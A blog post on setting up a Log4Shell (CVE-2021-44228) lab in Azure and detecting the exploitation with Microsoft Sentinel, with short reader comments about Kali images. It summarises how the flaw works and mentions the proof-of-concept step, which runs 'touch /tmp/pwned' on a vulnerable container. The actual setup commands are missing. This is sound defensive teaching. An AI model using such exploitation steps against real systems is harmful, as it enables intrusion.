The following post will guide creating a short Log4j lab to simulate the recent Log4j vulnerability on your Azure environment – Log4j LAB & Sentinel Detection. Remember, set up this lab in a dedicated environment to check your security control and not inside the production environment.
Log4J Overview
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified as being exploited in the wild. PoC code was released, and subsequent investigation revealed that exploitation was effortless to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker can instruct that system to download and subsequently execute a malicious payload.
Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems. Due to the discovery of this exploit being so recent, many servers, both on-premises and within cloud environments, have yet to be patched. We highly recommend that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.
Image credit: GovCERT
CVE-2021-44228 is considered a critical flaw, and it has a base CVSS score of 10 — the highest possible severity rating.
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI [Java Naming and Directory Interface] related endpoints,” the description reads. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”
LAB Setup
To run the Log4j lab, you need the following requirements, setup, and command:
Note: this will execute touch /tmp/pwned on the vulnerable web app.
Last, verify
$sudo docker exec vulnerable-app ls -la /tmp
Sentinel Detection
The next step is to make sure that you can see the POC and the command that you have run before. To know what is going on with your lab environment, make sure to forward platform logs to your Microsoft Sentinel. Once you have platform logs on your Microsoft Sentinel, you can use the hunting rules and other queries to detect the JNDI malicious actions.
Like any other cloud component, this feature changed under Kali GUI Linux by Techlatest.net.
The post will update soon with the latest options to install Kali on Azure.
Doesn’t seem that Kali is really in the Azure Marketplace anymore. I only see “Kali GUI Linux by Techlatest.net”
Like any other cloud component, this feature changed under Kali GUI Linux by Techlatest.net.
The post will update soon with the latest options to install Kali on Azure.
Elli.